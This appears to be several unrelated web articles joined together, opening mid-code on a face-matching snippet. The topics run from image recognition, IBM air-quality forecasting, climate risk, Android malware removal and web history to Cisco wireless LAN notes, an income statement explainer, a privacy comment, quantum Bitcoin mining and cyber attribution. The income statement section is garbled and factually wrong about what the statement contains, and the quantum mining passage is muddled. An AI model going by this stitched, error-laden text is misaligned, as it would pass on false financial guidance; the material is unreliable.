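    dot = sum(x * y for x, y in zip(a, b))
    norm = math.sqrt(sum(x * x for x in a)) * math.sqrt(sum(x * x for x in b))
    return dot / norm

# Toy 4-dimensional templates; real systems use hundreds of dimensions.
stored_template = [0.12, -0.48, 0.33, 0.80]
new_photo_face = [0.10, -0.45, 0.30, 0.82]

MATCH_THRESHOLD = 0.95  # hypothetical cutoff
if cosine_similarity(stored_template, new_photo_face) > MATCH_THRESHOLD:
    print("Suggest tagging this user")
```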
Healthcare offers more image recognition examples. Notably, the field that has benefited most visibly from image recognition technology is radiology. IBM estimated last year that at least 90% of all patient data consists of images. That has taken a big toll on radiologists, who need to evaluate an increasing number of images every day.
While the flood of medical images is bad news for human radiologists, it's great news for the deep learning algorithms at the core of many image recognition technologies. Deep learning algorithms need data to learn from; the more they have, the better they become.
Today, we are actually seeing a lot of cases where deep learning algorithms and image classification applications are outperforming human radiologists, and becoming a part of healthcare.
Another example is Enlitic, founded by Australian data scientist Jeremy Howard, the former president of Kaggle. Enlitic focuses on detecting tumors in lung CT scans to provide earlier diagnoses. In one of their internal tests, thanks to image recognition technology, Enlitic's software was 50% more accurate in diagnosing a lung tumor as malignant compared to a panel of radiologists.
Image recognition in security industry
The ability to recognize and identify faces is a very useful feature for the security industry, especially for protecting private property from intruders.
Home security systems are nothing new. Many homeowners install systems that have motion detectors and are connected to a security company that is on call 24/7. The problem with such systems is that they are primitive. Often they trigger false alarms because they mainly rely on motion or heat detectors, and those methods cannot differentiate between the owner of the house who forgot the password, the household pet that is going for a stroll in the house, or an actual intruder.
With image recognition technology in the mix, home security systems can now combat such issues. They can recognize and remember household members (regardless of lighting or angles) and differentiate between people and pets.
Netatmo Welcome, for example, has a feature that will start recording video only when the system detects unknown faces. Ulo, an adorable owl-shaped personal security device, has a similar feature but takes it further. When in presence of unknown faces, the device will start transmitting live video to the device of your choice.
Image recognition is also being embraced by law enforcement. In the UK, the South Wales Police are using facial recognition technology to help them scan bigger events and crowds when searching for suspects.
The system works together with the officers rather than instead of them. If the system flags anyone who bears at least a 59% resemblance to the suspect, the match is sent to a human officer to double-check before any action is taken. The use of the image recognition system has significantly cut down on costs and increased the overall efficiency of the police force.
Image recognition in automobile industry
Autonomous cars, although not widely available yet, are making significant progress towards that. Image recognition deserves a lot of credit for how well cars can navigate the world without a driver. Together with lidar and radar sensors, multiple video cameras detect traffic lights, read road signs, and keep track of other vehicles, while also looking out for pedestrians and other obstacles.
The benefits of driverless cars are many, and they are strong. Driverless cars can reduce the number of accidents, improve emissions compliance, and ease congestion. The reason is, machines are much better at following rules and faster at reacting to sudden distractions than humans.
Google's self-driving project Waymo has been testing and developing self-driving cars for almost 10 years now. They have even built a small town in the Arizona desert in the USA to trial their algorithms in different real-life scenarios.
Such leaps in technology are important for self-driving cars because, unlike in other industries, the margin for error is small. Every picture frame the algorithm is processing needs to be accurately analyzed in real-time as fast as possible because human lives are dependent on it.
Image recognition in retail industry
Thanks to image recognition technology, you might not have to try on clothes before you purchase them ever again.
A device called the visual mirror has been used by a few well-known brands, such as Topshop and Timberland, to let shoppers try on the entire range of clothes from their collections. The visual mirror can be installed inside a shop or even outside of it to attract customers into the shop.
The mirror is actually a big screen with multiple cameras that detect the different body parts of the person standing in front of it. The mirror picks the correct size, and you can turn around and see how the clothing sits on your body from all angles. You can also search for colors and styles of your choice, which makes the shopping experience even more convenient.
Some versions of visual mirrors let you take pictures of the outfits you’ve put together, send them to your phone and create a complete inventory of all the pieces that you can find physically in the store.
While the visual mirror works to make shopping more convenient, a Japanese firm created a security system called AI Guardian that intends to eliminate shoplifting.
The technology behind AI Guardian scans full bodies rather than just faces and identifies so-called suspicious behavior based on a training data set that describes the attributes of a shoplifter.
A store test in Japan showed a 40% drop in shoplifting after this technology was implemented. Although this technology is not yet widespread, the creators behind AI Guardian and other similar security cameras say that it's only a matter of time before it is widely implemented and the accuracy of the results is perfected.
Work with InData Labs on your machine learning project
Have a project in mind but need some help implementing it? Drop us a line at email@example.com, we'd love to discuss how we can work with you.
The announcement builds on a year-long collaboration with the Beijing Environmental Protection Bureau (EPB) and includes more than a dozen commercial deals and research engagements on four continents.
IBM’s China Research lab is working with the Beijing EPB to provide an advanced air quality forecasting and decision support system that is able to generate high-resolution 1km-by-1km pollution forecasts 72 hours in advance and pollution trend predictions up to 10 days into the future.
The system models and predicts the effects of weather on the flow and dispersal of pollutants as well as the airborne chemical reactions between weather and pollutant particles. In the first three quarters of this year, the Beijing government was able to achieve a 20 percent reduction in ultra-fine particulate matter (PM), bringing it closer to its goal of reducing PM 2.5 by 25 percent by 2017.
The new Green Horizons engagements apply IBM’s machine learning and Internet of Things (IoT) technologies to ingest and learn from vast amounts of big data, constantly self-configuring and improving in accuracy to create accurate energy and environmental forecasting systems.
“Even as society is looking to address some of the biggest challenges of our generation — environmental degradation and climate change — two game-changing technologies have emerged that are completely transforming our understanding of the world in which we live,” said Arvind Krishna, senior vice president and director of IBM Research, in a statement. “With Green Horizons, we are applying the most advanced cognitive computing and IoT technologies, combined with world-class analytics, to enable forward-looking government and business leaders in their efforts to make better decisions that can help safeguard the health of citizens today while helping to protect the long-term health of the planet.”
Big Blue’s engagements with Green Horizons include an agreement with the Delhi Dialogue Commission to understand the correlation between traffic patterns and air pollution in India’s capital of New Delhi, and provide the government with ‘what if’ scenario modeling to support more informed decision-making for cleaner air.
“Air pollution is a global challenge and one of the top environmental risks to human health. Our India research team is helping to create a powerful decision support system with unprecedented accuracy,” said Dr. Ramesh Gopinath, vice president and CTO of IBM Research, India, in a statement. “This will not only advance understanding of today’s issues, but provide actionable insight for addressing them while also protecting economic activity and livelihoods. The Delhi government is taking bold and futuristic steps to transform the city’s air quality and we are committed to help them with our most advanced technologies and best talent from around the world.”
IBM also has engaged in a pilot program with the city of Johannesburg and South Africa’s Council of Scientific and Industrial Research to model air pollution trends and quantify the effectiveness of the city’s programs supporting Johannesburg’s air quality targets and long-term sustainable development.
“Air pollution is now the world’s largest environmental health risk. While Johannesburg does not yet have the air pollution challenges to the scale of the world’s megacities, continued economic and demographic growth mean that the city government must take action now to safeguard the future health of the city and its people,” said Solomon Assefa, director of IBM’s South Africa Research Lab, in a statement. “The combined power of Internet of Things and cognitive computing means that understanding, managing and forecasting air quality today is more technically and economically feasible than ever before.”
Nthatisi Modingoane, deputy director of communications for the city of Johannesburg, added, “For Johannesburg to be a world-class African city, we need world-class solutions to deliver on pressing problems like air pollution. This is where our partnership with IBM comes in. Using advanced decision analytics and pollution forecasting technologies, we will strengthen our air quality management strategies and gain greater situational awareness of the challenges at hand.”
IBM has additional clean air projects in China with the Environmental Protection Bureau in Baoding — one of China's most polluted cities — to support the city's environmental transformation; the city of Zhangjiakou, host to the 2022 Winter Olympics, to improve air quality for the outdoor sporting event; and Xinjiang Province in northwest China.
“Air pollution and climate change are global challenges that require stronger action by government and business,” said Bob Perciasepe, president of the Center for Climate and Energy Solutions (C2ES), in a statement. “To get to a clean energy future, we need accurate data about emissions, air quality and power generation. Advanced technologies can provide crucial insights about our impacts on the environment — today and in the future.”
In addition, IBM’s Green Horizons program is delivering on its promise to help increase contributions of wind, solar and other renewable energy sources to national grids. New customer engagements include:
–UK energy giant SSE is piloting IBM technology to help forecast power generation at its wind farms in Great Britain. The system is able to forecast energy output for individual turbines and includes visualization tools to show expected performance several days ahead.
–In Japan, IBM is working with the Toyo Engineering Corporation and renewable energy company Setouchi Future Creations LLC on the Setouchi solar project. IBM’s monitoring systems will help Setouchi control energy from the plant’s 890,000 solar panels.
–Through the United States Department of Energy’s SunShot initiative, IBM is making renewable energy forecasting technology available to government agencies, utilities and grid operators to support supply and demand planning.
–IBM is working with Chinese wind power solution provider Xinjiang Goldwind Science & Technology Co. to apply IoT, cloud computing, big data analytics and other technologies to wind power forecasting. Also in China, Shenyang Keywind Renewable Company is using cognitive forecasting technologies to help integrate more wind energy into the grid.
–The Zhangbei Demonstration Project, managed by China’s State Grid Jibei Electricity Power Company, is tapping the power of Green Horizons renewable energy forecasting technology to integrate 10 percent more alternative energy into the national grid, enough to power more than 14,000 homes.
IBM’s Green Horizons initiative is based on innovations from the company’s research laboratory in Beijing, with contributions from leading environmental experts across IBM’s global network of research labs.
“In the past two decades China has been at the center of global manufacturing and economic growth,” said Dr. Xiaowei Shen, director of IBM Research, China. “However, this great progress has come at a cost and today the Chinese government has placed air pollution and climate change high on the national agenda. With Chinese investments into green innovation worth billions of dollars and with a new budding generation of environmental scientists coming to the fore, China is the natural starting point for IBM’s Green Horizons initiative which is now being exported to other parts of the world.”
To support China’s clean air action plan, IBM has entered a number of collaborations across the country. Building on their existing relationship, IBM and the Beijing Environmental Protection Bureau are launching a new Joint Environmental Innovation Center that will provide decision support capabilities to the Beijing government.
Using scenario modeling, the government will be able to optimize its emission reduction strategy and seek a balance between clean air and continued economic growth. Measures include short term limitations on urban traffic and construction activity as well as long term improvements to industrial production and power generation. These include switching to cleaner energy sources and installing filtering systems. The Beijing EPB also uses a colored alert system to warn citizens when harmful levels of pollution are forecast for the coming days.
“Our environmental engineers are working on a daily basis to tackle Beijing’s complex and challenging pollution problem and protect the health of citizens,” said Dawei Zhang, director of Beijing’s Environmental Monitoring Center, a department of the BEPB.
Researchers highlight how cascading extreme weather events risk damaging entire socioeconomic systems
- Published: Thursday, 11 August 2022 07:39
The cascading effects of extreme weather – such as concurrent heatwaves and droughts – and the interconnectedness of critical services and sectors have the potential to destabilize entire socioeconomic systems, according to a new study published in PLOS Climate by Laura Niggli at the University of Zurich, Switzerland, and colleagues.
The study says that many risk assessments and resilience plans only consider individual, rather than cascading and concurrent, events.
To better understand how extreme weather might affect interlinked socioeconomic systems, the authors of the present study conducted a qualitative network-type analysis, first reviewing studies of eight historical concurrent heat and drought extreme events in Europe, Africa, and Australia. Next, they compiled examples of interlinked impacts on several critical services and sectors, including human health, transport, agriculture and food production, and energy. For example, drought events reduced river navigation options, limiting the transport of critical goods. Rail transport was simultaneously impacted when prolonged heat buckled the tracks. Using these analyses, researchers created visualizations of the interconnected effects of concurrent heat and drought events on those services and sectors.
The researchers found that the most important cascading processes and interlinkages centred on the health, energy, and agriculture and food production sectors. In some instances, response measures for one sector had negative effects on other sectors. Future research should focus on response measures in interconnected systems to improve resilience to compound heat and drought events, the study says.
According to the authors, “We identified an interconnected web of sectors that interact and cause additional losses and damages in several other sectors. This multilevel interconnectedness makes the risks of compound extreme events so complex and critical. More efforts should be concentrated on the analysis of such cascading risks and on strategies to interrupt such chains of impacts, rather than compartmentalizing risk assessment into single extreme events, impacts and sectors”.
Read the paper ‘Towards improved understanding of cascading and interconnected risks from concurrent weather extremes: Analysis of historical heat and drought extreme events’ by Niggli L, Huggel C, Muccione V, Neukom R, and Salzmann N.
How to Remove a Virus from Android Devices
Spyware, adware, and other types of malware used to affect only our computers. But now that almost everyone has a smartphone in their pocket, Android viruses are starting to spread too. Even though they are still not very common, there’s more than one way to end up with one on your phone.
How does a virus get into Android devices?
Skipping software updates
Users should install updates as soon as they are available, both for the OS and individual apps. They often contain important security patches, and if you forget or postpone them, someone might exploit the vulnerabilities to get malware onto your device.
Using third-party app stores
Official app stores vet every app they offer, but malicious applications still occasionally manage to slip in. Third-party app stores have no such regulations, so you never know whether an app will be genuine or not. Malware is often disguised as a popular app to trick people into downloading and installing it. Unfortunately, a lot of people tempted by a free version of a paid app get a virus instead.
Clicking on malicious links
It might be a phishing email urging you to log into your bank account or a flashy banner on an insecure website. Clicking on it could download malware to your smartphone. Many people don’t even notice that they’ve downloaded something until their devices start malfunctioning.
Virus on Android: signs to look out for
If you think your Android might have malware, there are a few things you should pay attention to:
A sudden drop in battery life. Malware will drain your battery faster. You can check for unusual power usage in your device’s settings. If any of the apps use more energy than they should — especially if it’s one that you have recently installed — make sure to investigate.
The device slows down and overheats. In addition to battery power, malware will also use a lot of other resources. This will cause your phone to lag so much it becomes difficult to use. However, decreased performance is normal if you’ve already had your phone for a while. And if you’re doing something that requires a lot of resources, like playing a game, the device can get quite warm too.
Your bills look different. Malware might use your data to send and receive information. It could also make calls or send SMS to spread itself to your contacts. Check your messages, outgoing calls, and data usage statistics. If anything seems out of the ordinary (like data usage spikes in the middle of the night), it could mean that you have a virus on your phone.
Invasive ads. If you start seeing pop-ups whenever you browse on your smartphone, it’s probably infected with adware. Don’t click on any of them, as they will likely lead you to websites with more malware. A virus could also randomly redirect you to malicious sites when you try to access something else. Again, don’t click on anything, close the browser app immediately, and perform a virus scan.
How to check for malware on Android
If you’re experiencing problems with your Android, a virus scan can help determine if you really have malware. There are a lot of antivirus apps on the Google Play Store, developed by popular security brands. Most will even offer a free scan.
The scan should reveal any malicious apps and files you have, but if nothing comes up, you can try deleting the apps you installed most recently. Pay special attention to any that you don’t remember downloading in the first place.
How to remove a virus from an Android device
Go to the app list in the settings and tap on the ones you want to delete. If the “Uninstall” button is unresponsive, the app probably has admin access. However, it can still be removed.
Go to the security settings on your device and check the administrators. If there are any apps that you know shouldn’t have this access, deactivate them. That should allow you to delete them normally.
The nuclear option
If all else fails, there’s one last thing you can do — a factory reset. Setting up your phone again might take some time, but at least it’s a guarantee you’ll get rid of the malware. Go to the system settings and select “Factory reset.” Make sure to save your contacts, important messages, and photos to the cloud before doing it because your phone will be wiped clean.
How to avoid Android viruses in the future
Be careful even on the official Play Store, as there are a lot of clones — apps that only pretend to be popular services. Always check the developer and reviews before downloading anything. If something seems off, search for more information online just to stay on the safe side.
If you’re concerned that you might get another virus, download an antivirus app. There are both paid and free options to choose from. Keep in mind that they don’t always work perfectly and might flag apps that are safe to use. But that will, at the very least, encourage you to double-check everything you download and give you peace of mind.
The story behind the world wide web
Today is the world wide web’s 31st birthday. We can hardly imagine work, school, and our daily lives in general without it. Because of the world wide web, we now have cat videos, instant messaging, online banking, and heated discussions on whether pizza should come with pineapple.
How did the technology come about? Who and why created it?
How was the world wide web created?
Tim Berners-Lee created the world wide web (or simply the web) in 1989. The British scientist, who worked at CERN (the European Organization for Nuclear Research) at the time, was looking for a way to make information sharing between scientists easier and faster. He did it by combining local computer networks with hypertext technology.
The first website, also created by Tim Berners-Lee, launched on December 20, 1990. He hosted it on his own computer. The site explained what the web was and talked about the story and the people behind it. It also included instructions on how to create your own webpage or set up a web server. In 2013, CERN started a project to restore the world’s first website.
Upon its launch, the world wide web was supposed to be used by universities and scientific institutes only. However, in 1993, CERN announced that they were putting the web into the public domain. That meant it was open for everybody to improve and build upon.
In just a few years, the web had millions of users. The first browsers that didn’t require command lines started showing up, like Mosaic and Netscape Navigator. Their user-friendly interfaces meant that more people, not only scientists, could use the web.
Web servers were also popping up, like Microsoft’s Internet Information Server, developed to handle the massive amounts of traffic going through Microsoft’s web page. With more servers, more and more web pages appeared, many of which most of us still use today: IMDB, Bloomberg, Yahoo, eBay, etc.
In these early days of the web, people needed to know the domains of the pages they wanted to visit. Therefore, the first web users went to online directories — sort of like phone books for web pages. They linked to other sites and were updated manually. But soon, there were too many websites for people to keep track of.
That’s when search engines started gaining momentum, and the information sharing that Tim Berners-Lee first imagined went to a whole new level. Web users can now find almost anything they want in a matter of seconds.
World wide web vs the internet: are they the same thing?
Although many people use the terms “world wide web” and “internet” interchangeably, they are not the same thing.
The internet is a huge network comprised of many smaller networks. On the lowest level, all the devices in your house connected to the Wi-Fi router make up your local area network (LAN). Similarly, all the devices in your office or university campus create their LAN. These LAN networks from all the houses in your neighborhood connect to a Wide Area Network (WAN), which then connects to another, even larger network of your city, county, state, etc. The combination of all these networks forms the internet.
We use the web to access and navigate the internet. There’s a lot of information out there, and we wouldn’t be able to find, view, and use it without the technology of the world wide web. It includes HTTP, HTML, and URLs — all of which were also created by Tim Berners-Lee 31 years ago and are still essential if we want to go online today.
The internet is only a network of connected machines — the web is what gives this network life and allows us to navigate it successfully.
Cisco CCNA Introduction to Wireless LANs
This chapter will cover Wireless LANs.
Cisco CCNA Differences Between WLAN and LAN
Following is an explanation of how WLANs differ from LANs.
-> In WLANs, radio frequencies are used as the physical layer of the network.
– WLANs use CSMA/CA (Carrier Sense Multiple Access with Collision Avoidance) instead of the CSMA/CD (Carrier Sense Multiple Access with Collision Detection) used by Ethernet LANs. Collision detection is not possible because a sending station cannot receive at the same time that it is transmitting and, therefore, cannot detect a collision. Instead, the Request to Send (RTS) and Clear to Send (CTS) protocols are used to avoid collisions (a simplified sketch of this process follows the list below).
– WLANs use a different frame format than wired Ethernet LANs. Additional information for WLAN is required in the Layer 2 header of the frame.
-> Radio waves have problems not found in wires.
– Connectivity issues in WLANs can be caused by coverage problems, RF transmission, multipath distortion, and interference from other wireless services or other WLANs.
– Privacy issues are possible because radio frequencies can reach outside the facility.
-> In WLANs, mobile clients connect to the network through an access point, which is the equivalent of a hub in a wired Ethernet LAN.
– Mobile clients do not have a physical connection to the network.
– Mobile devices are often battery powered as opposed to being electrically powered as they are for LANs.
-> WLANs must meet country-specific RF regulations.
– The aim of standardization is to make WLANs available worldwide. Because WLANs use radio frequencies, they must follow country-specific regulations of RF power and frequencies. This requirement does not apply to wired LANs.
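As a rough illustration of the CSMA/CA process mentioned in the list above, here is a minimal Python sketch. It is not the real 802.11 DCF state machine — interframe spacings, ACKs, and many other details are omitted — and the channel object with its methods is a hypothetical stand-in for the shared radio medium.

import random
import time

def send_with_csma_ca(channel, frame, max_retries=7):
    # Simplified CSMA/CA: listen first, back off randomly, then
    # reserve the medium with RTS/CTS before transmitting.
    for attempt in range(max_retries):
        # Carrier sense: wait until the medium appears idle.
        while channel.is_busy():
            time.sleep(0.001)
        # Collision avoidance: random backoff before transmitting.
        # The contention window roughly doubles after each failed attempt.
        slots = random.randint(0, 31 * (2 ** attempt))
        time.sleep(slots * 0.00002)  # illustrative 20-microsecond slot time
        # Reserve the medium: Request to Send / Clear to Send handshake.
        if channel.send_rts() and channel.wait_for_cts():
            channel.transmit(frame)
            return True  # CTS received; data frame sent
    return False  # gave up after repeated contention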
Cisco CCNA Radio Frequency Transmission
Radio frequencies are radiated into the air by antennas that create radio waves. As radio waves propagate, they may be absorbed by some objects (for instance, walls) and reflected by others (for instance, metal surfaces). This absorption and reflection may cause areas of low signal strength or low signal quality.
The transmission of radio waves is influenced by the following factors:
Reflection: Occurs when radio frequency (RF) waves bounce off objects (for example, metal or glass surfaces).
Scattering: Occurs when RF waves strike an uneven surface (for example, a rough surface) and are reflected in many directions.
Absorption: Occurs when RF waves are absorbed by objects (for example, walls).
The following rules apply for data transmission over radio waves:
- Higher data rates have a shorter range because the receiver requires a stronger signal with a better signal-to-noise ratio (SNR) to retrieve the information.
- Higher transmit power results in greater range. To double the range, the power has to be increased by a factor of 4, because received signal strength falls off roughly with the square of the distance in free space.
- Higher data rates require more bandwidth. Increased bandwidth is possible with higher frequencies.
- Higher frequencies have a shorter transmission range due to higher degradation and absorption. This can be compensated for with more efficient antennas.
Cisco CCNA Organizations That Define WLAN Standards
Regulatory agencies control the use of the RF bands. With the opening of the 900-MHz ISM band in 1985, the development of WLANs started. New transmissions, modulations, and frequencies depend on the approval of the regulatory agencies. A worldwide consensus is required. Regulatory agencies include the Federal Communications Commission (FCC) for the United States (http://www.fcc.gov) and the European Telecommunications Standards Institute (ETSI) for Europe (http://www.etsi.org).
The IEEE defines standards. 802.11 is part of the 802 networking standardization. You can download ratified standards from the IEEE website (http://standards.ieee.org/getieee802).
The Wi-Fi Alliance offers certification for interoperability between vendors of 802.11 products. This certification provides a comfort zone for the users who are purchasing the products. It also helps to market WLAN technology by promoting interoperability between vendors. Certification includes all three 802.11 RF technologies and Wi-Fi Protected Access (WPA), a security model released in 2003 based on the new security standard IEEE 802.11i, which was ratified in 2004. The Wi-Fi Alliance promotes and influences WLAN standards. Certified products can be found on the Wi-Fi website (http://www.wi-fi.org).
Cisco CCNA ITU-R and FCC Wireless Frequency Bands
There are three unlicensed bands: 900 MHz, 2.4 GHz, and 5 GHz. The 900-MHz and 2.4‑GHz bands are referred to as the Industrial, Scientific, and Medical (ISM) bands, and the 5‑GHz band is commonly referred to as the Unlicensed National Information Infrastructure (UNII) band.
Frequencies for these bands are as follows:
900-MHz band: 902 MHz to 928 MHz.
2.4-GHz band: 2.400 GHz to 2.483 GHz. (In Japan, this band extends to 2.495 GHz.)
5-GHz band: 5.150 GHz to 5.350 GHz and 5.725 GHz to 5.825 GHz, with some countries supporting middle bands between 5.350 GHz and 5.825 GHz. Not all countries permit 802.11a, and the available spectrum varies widely. The list of countries that permit 802.11a is changing.
In the RF spectrum, the WLAN frequencies sit next to other wireless services such as cellular phones and NPCS (Narrowband Personal Communication Services). The frequencies used for WLAN are the ISM bands.
Unlicensed frequency bands do not require a license to operate wireless equipment. However, there is no exclusive use of a frequency for a user or a service. For example, the 2.4-GHz band is used for WLANs, video transmitters, Bluetooth, microwave ovens, and portable phones. Unlicensed frequency bands offer a best-effort use, and interference and degradations are possible.
Even though these three frequency bands do not require a license to operate equipment, they are still subject to local country-code regulations that limit characteristics such as transmitter power, antenna gain (which increases the effective power), and the total output of the combined transmitter, cable, and antenna.
Effective Isotropic Radiated Power (EIRP) is the final unit of measurement used by local country regulators. Therefore, caution should be used when replacing a component of wireless equipment, such as an antenna, to increase range. The result could be a total wireless system that is illegal under local codes.
EIRP = transmitter power + antenna gain – cable loss
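For example, using hypothetical numbers: a 100-mW (20-dBm) transmitter feeding a 6-dBi antenna through a cable with 3 dB of loss gives

EIRP = 20 dBm + 6 dBi – 3 dB = 23 dBm (roughly 200 mW)

If a local code capped EIRP at 20 dBm, this combination would exceed the limit even though the transmitter alone is compliant — which is why swapping in a higher-gain antenna can make an otherwise legal system illegal.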
Note: Only use antennas and cables supplied by the original manufacturer and listed for the specific access point implementation. Only use qualified technicians who understand the many different variations and requirements to comply with local RF country regulatory codes.
Cisco CCNA IEEE 802.11 Standards Comparison
The original 802.11 wireless standard was completed in June 1997, revised in 1999 (802.11a/b) and reaffirmed in 2003 (802.11g). The IEEE standard defines the physical layers and the MAC sublayer of the data link layer of the OSI model. By design, the standard does not address the upper layers of the OSI model. Three transmission techniques — Infrared (IR), Frequency Hopping Spread Spectrum (FHSS), and Direct Sequence Spread Spectrum (DSSS) — were originally defined. The light-based IR medium quickly became obsolete, leaving FHSS and DSSS for most implementations.
FHSS transmissions hop between frequencies following a defined algorithm to minimize interference, while DSSS uses just one channel and spreads the data across all the frequencies defined by that channel. Since the two technologies use different approaches to minimizing interference, they are mutually incompatible.
IEEE 802.11 divided the 2.4-GHz ISM band into 14 channels; however, local regulatory bodies such as the FCC designate which channels are allowed — for example, channels 1 through 11 in the United States. Each channel in the 2.4-GHz ISM band is 22 MHz wide, with only 5 MHz of separation between the center frequencies of adjacent channels, so each channel overlaps the channels before and after it. A separation of five channels is therefore needed to ensure unique, non-overlapping channels. Given the FCC example of 11 channels, the maximum set of non-overlapping channels is 1, 6, and 11.
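The 1, 6, 11 result can be checked with a few lines of Python. Channel n in the 2.4-GHz band is centered at 2407 + 5n MHz (so channel 1 is 2412 MHz; channel 14 in Japan is a special case and is ignored here), and two 22-MHz-wide channels overlap whenever their centers are less than 22 MHz apart:

def center_mhz(channel):
    # Center frequency of a 2.4-GHz band channel (channel 1 = 2412 MHz).
    return 2407 + 5 * channel

def overlaps(ch_a, ch_b, width_mhz=22):
    # Two channels overlap if their centers are closer than one channel width.
    return abs(center_mhz(ch_a) - center_mhz(ch_b)) < width_mhz

for a, b in [(1, 6), (6, 11), (1, 11)]:
    print(a, b, overlaps(a, b))  # all False: 1, 6, and 11 do not overlap

print(overlaps(1, 5))  # True: centers only 20 MHz apart, inside the 22-MHz width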
An income statement is one of the two main financial reports of a business that, used together, give the owner or management a basic idea of what the business has been doing and how it will do in the future. Generally, an income statement lists the following information for each month: income from sales, income from firm operations, and income from other sources. The income statement also lists inventory, current assets, and long-term liabilities in the following categories: accounts payable, accrued expenses, paid in full, inventory reserves, and property and equipment. The statement does not include inter-company transactions, trade debtors, and stockholders. The statement does not record personal assets and liabilities. Instead, it focuses on company assets.
Many small business owners are unsure as to what an income statement should look like. There are many reasons for this. Most small businesses are family owned and operated and therefore, the personal assets of the business are usually not as obvious as those of a large corporation. Additionally, some personal assets may have been included in the business when it was first started and later included when the business became its own separate legal entity. The reason for the existence of an income statement is to help both owner and manager (the CEO and CFO) understand the income statement they are seeing in order to make sound business decisions.
The purpose of this statement is to provide adequate, fair, and accurate information to a CPA (Certified Public Accountant) who is providing accounting services to the business owner or manager. The income statement provides a company with three things that can be compared to a profit and loss statement: income from sales, firm operations, and other expenses. The income statement compares the cost of goods sold to the cost of assets owned by the company during a specific period of time. It is comparable to the income statement of an individual. Most people compare the income statement to their personal statement because, technically, an individual’s statement is income only in the eyes of the individual.
As mentioned earlier, the purpose of the income statement is to provide a CPA with enough information to determine the net income, or the bottom line. The bottom line is the income that remains at the end of the day. Some CPAs may choose to include other factors in their calculations, including: Other Income, Investing Income, Interest Income, and Expenses. The difference between a profit and a loss is the difference between the net income and the bottom line. In essence, all expenses are deducted from revenue to calculate the profit.
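As a simple illustration (all figures are invented), the flow from sales down to the bottom line looks like this:

Sales revenue: $100,000
Cost of goods sold: – $40,000
Gross profit: $60,000
Operating expenses: – $35,000
Operating income: $25,000
Interest and taxes: – $7,000
Net income (the bottom line): $18,000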
There are two types of income statements. There are total assets with all short-term and long-term debts added together. There are also assets, liabilities, and net worth. The long-term assets refer to the long-term debts (liens, stock, and bonds) while the short-term ones refer to the inventory, goodwill, and capital assets. All items are accounted for on the balance sheet as liabilities and net worth.
The major sections of an income statement are Accounts Receivable, Accounts Payable, and Income Taxes. This is basically where your cash flows are recorded on the balance sheet. You will see many different ways to record your sales and payments on accounts receivable and accounts payable. These three items are often confused, but they really are all the same.
The final section of an income statement is the Investing and Financing section. Here, you will see your cost of capital, expenses for working capital, net incomes from equity instruments, other direct revenues, and the resulting net profits or cash flows. This section of your statement gives you the ability to see your operating expenses, financing costs, and your net income and ratios.
Now that you understand the basics of income statements, you will be better prepared to handle your own financial records and know what your actual results were. Even if you are not a professional accountant, you can still prepare one of these financial reports. All you need is a spreadsheet, a basic accounting software program, and the income statement that you want to include. You will then want to calculate your short-term and long-term assets and liabilities and the other fundamentals that go along with your income statement. Once you have your spreadsheet completed and ready to go, you can then send it out to a few of your customers or clients so that they can see your income statement and determine how their business might impact your own business. If your numbers are all right, you should be able to receive funding fairly quickly, which is important to growing your business. | <urn:uuid:d6ad5322-c23a-4e74-97ae-90adf8dd4369> | CC-MAIN-2022-40 | https://globalislamicfinancemagazine.com/how-to-prepare-your-income-statement/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00386.warc.gz | en | 0.96665 | 917 | 2.953125 | 3 |
Following the news that Facebook may be developing its Messenger app to encrypt messages and allow people to set a time limit after which their messages will be deleted, David Emm, Principal Security Researcher at Kaspersky Lab, provides insight on this news.
David Emm, Principal Security Researcher at Kaspersky Lab:
“The news that Facebook may be developing its Messenger app to encrypt messages and allow people to set a time limit after which their messages will be deleted may be an appealing function for many, but there are dangerous consequences that need to be considered. It could encourage people to share sensitive information with each other with the false sense of security that the messages cannot be retained or published further after that time period has elapsed. Yet this still does not stop somebody who receives a message from taking a screenshot and then sharing it online.
With the rise in consumers accessing new types of technology, such as dating and messaging apps, comes the need for them to exercise their own vigilance to help protect themselves, as unfortunately not all sites implement good security. We would recommend educating younger people on the risks which accompany sharing information online. A good rule of thumb is that if you wouldn’t publish something on the front page of a newspaper, don’t post it online or trust it to an app.
The danger of oversharing information can be explained quite simply: private text that was once personal might lose its privacy altogether. Today’s communication channels enable quick sharing, but defy any control of the data as soon as it’s been shared.
A victim may not necessarily know immediately that their private information has been shared online. The text might resurface weeks, months or even years after it was written and sent. Once sensitive text finds its way to the Internet, the consequences might be serious. For example, the compromised content might be used for blackmailing, regardless of the age of the person whose data it is.
With that in mind, the best advice is not to share sensitive text with others at all. No content, no problem.”
Can a Future Quantum Computer Mine Bitcoins?
(BTCWires) The kind of power that quantum computers will possess could easily be used in the future for a process as energy-intensive as Bitcoin mining. Quantum computers could essentially take over from the multiple computer nodes used today for Bitcoin mining. Instead of working in a Bitcoin mining pool, where a number of computers work together, a quantum computer could be used to mine Bitcoins.
Due to the potential ability of quantum computers to make difficult problems much easier to solve, they could be a great alternative to the current system of multiple computer nodes for Bitcoin mining. The processing power can be distributed among numerous probable realities. The quantum computer will need to be programmed, but it will be possible to use it as a substitute for regular nodes.
Cyberattacks are devastating for the victims, regardless if these are individuals, companies, agencies, or government organizations. Finding out who is behind the attacks is crucial to take action against the threat actors and to prevent future attacks. This process is known as cyber attribution; the process of tracking, identifying and holding the threat actor(s) behind a cyberattack or other hacking exploit responsible.
Cyber attribution is a complicated process since threat actors must be identified, their activities have to be traced, and their affiliation with certain groups must be detected to map patterns of behavior that allow investigators and analysts to get insight into their motivation, (potential) targets and victims, business model, and conducted and planned cyberattacks.
Since the majority of their activities and communications take place online, threat actors use the architecture of the internet, specifically the dark web, to remain anonymous, obfuscate the origin of their cyberattack, and hide their tracks. This means that investigators and analysts must process huge amounts of web data from the surface, deep, and dark web to attribute the cyberattacks with a high degree of certainty with limited resources and budgets. Since threat actors operate across borders and know how to raise false flags by casting suspicion on other actors, an AI-powered WEBINT platform is needed that is easy to use and can handle the quantity and quality of data needed for evidence to ensure the integrity of the investigative process.
So how can a WEBINT platform play a crucial part in cyber attribution?
The WEBINT platform of Cobwebs will collect, analyze, and extract public data on all web layers, message boards, social media, etc. relating to the cyberattack automatically to provide executable insights. It also enables analysts and investigators to search for specific individuals and/or keywords to investigate certain online forums and market places on the dark web where threat actors and persons of interest might hide. Since even the savviest threat actors leave digital footprints, the sophisticated machine-learning algorithms and AI will analyze the collected data to de-anonymize the threat actors behind the cyberattack.
